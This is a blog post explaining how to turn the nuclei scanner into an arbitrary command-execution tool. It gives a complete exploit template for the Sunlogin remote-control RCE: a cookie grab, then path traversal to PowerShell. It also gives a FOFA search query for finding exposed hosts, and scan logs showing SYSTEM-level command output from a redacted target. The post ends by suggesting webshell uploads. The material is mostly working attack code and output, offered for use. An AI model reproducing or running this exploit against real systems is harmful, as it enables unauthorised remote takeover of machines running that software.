所有的授权实战入侵网站已添加“如何入侵”标签,在侧边栏的归档中选择“如何入侵”即可查看所有文章

MENU

How to use nuclei to rce with any command

November 26, 2023 • Read: 607 • 常山阅读设置

How to use nuclei to rce with any command

A few weeks ago, I realized that we can use nuclei to rce with any command. You know, nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL. We can find a lot of vuls through nuclei.

There are some flags to achieve specific function in nuclei, Such as: -dresp, -V.

some Flags

-dresp flag can show all received responses for all templates.

-V flag can customize vars in key=value format.

nuclei template

there is a flag(variables) which can be used to customize vars in nuclei template. For example:

id: sunlogin_rce

info:
  name: 向日葵RCE
  author: Xc1Ym
  severity: critical
  description: 通过该链接可以执行命令
  metadata:
    max-request: 2
    verified: true
    fofa-query1: body="Verification failure"
    fofa-query2: app="向日葵-远程控制"
  tags: rce
variables:
  cmd: "ipconfig"
http:
    - raw:
      - |
        GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+{{cmd}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}
      extractors:
        - type: json
          part: body
          internal: true
          name: cid
          json:
          - '.verify_string'
      matchers:
        - type: dsl
          dsl:
            - "status_code_1==200"
            - "contains(body_1, 'verify_string')"
            - "status_code_2==200"
            - "contains(body_2, 'Windows IP')"
          condition: and
# digest: 490a0046304402200b08d3b3306a25fe78dc7485bc5f3f766a1189738e6d89ae775afa9ed4d3f1d1022002274e233fe7383a0c9e87f6c09ddbdad543c653e6d0592d813e76c7235eae57:ac885261be3fdd93c33050b022a2b6f1

We have set the default value for cmd parameter to ipconfig. If we wish to change it to whoami, we can use -V flag. And we can also use -dresp flag to show all received responses for all templates, if we know that the IP are vulnerable.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[sunlogin_rce] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

Use dresp to show the received responses.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras

HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html

{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

HTTP/1.1 200 OK
Content-Length: 750
Cache-Control: no-cache
Content-Type: text/json


Windows IP ����


��̫�������� ��̫��:

   �����ض��� DNS ��׺ . . . . . . . :
   �������� IPv6 ��ַ. . . . . . . . : xxx
   IPv4 ��ַ . . . . . . . . . . . . : xxx
   ��������  . . . . . . . . . . . . : xxx
   Ĭ������. . . . . . . . . . . . . : xxx

���������� isatap.{xxx}:

   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�����
   �����ض��� DNS ��׺ . . . . . . . :

���������� Teredo Tunneling Pseudo-Interface:

   �����ض��� DNS ��׺ . . . . . . . :
   IPv6 ��ַ . . . . . . . . . . . . : xxx
   �������� IPv6 ��ַ. . . . . . . . : xxx
   Ĭ������. . . . . . . . . . . . . : ::
[sunlogin_rce:dsl-1] [http] [critical] http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig

Use -V to customize vars. We can watch the nuclei executed whoami and show the result.

PS C:\Users\qaxnb> nuclei -t D:\note\private-nuclei-template\rce\sunlogin_rce.yaml -u http://xxx -dresp -V cmd=whoami

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

                projectdiscovery.io

[WRN] Found 12 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/cgi-bin/rpc?action=verify-haras

HTTP/1.1 200 OK
Content-Length: 87
Cache-Control: no-cache
Content-Type: text/html

{"__code":0,"enabled":"1","verify_string":"xxx","code":0}
[DBG] [sunlogin_rce] Dumped HTTP response http://xxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

HTTP/1.1 200 OK
Content-Length: 21
Cache-Control: no-cache
Content-Type: text/json

nt authority\system

In the end

If you want to rce witch any command, you can use variables in your template.

And you can also use nuclei to upload webshell and execute commands by webshell.

Archives QR Code Tip
QR Code for this page
Tipping QR Code